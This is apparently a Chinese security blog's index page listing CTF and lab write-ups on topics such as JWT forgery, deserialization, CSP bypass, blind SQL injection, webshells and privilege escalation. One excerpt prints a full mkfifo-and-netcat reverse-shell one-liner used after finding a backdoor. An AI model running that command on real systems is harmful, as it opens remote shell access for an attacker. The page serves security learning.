你与春风皆过客

Connect-The-Dots 靶机渗透


natraj 靶机渗透


Dozer域渗透


Windows命令执行bypass


[V&N2020 公开赛]EasySpringMVC(java反序列化)


ACTF PasteBin(JWT)伪造


Windows下参数污染跨目录执行文件

原文链接

https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe


记录一次渗透测试。


ACTF up up(提权)

www.zip下载得到一个一句话的后门
连接上去。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP port >/tmp/f


[Zer0pts2020]musicblog(绕过CSP。进行请求)

我们输入的东西。管理员会给你点赞


[RCTF2019]calcalcalc (盲注)

github下源码。
打开index.hbs。


RACTF(Web)

Web有两个系列的题。考点都比较简单。
主要就是考思路吧。


利用|和&来进行无数字webshell


原生类文件读取


[Zer0pts2020]phpNantokaAdmin(sqlite)

首先下源码。
看index.php关键代码


← 上一页 下一页 →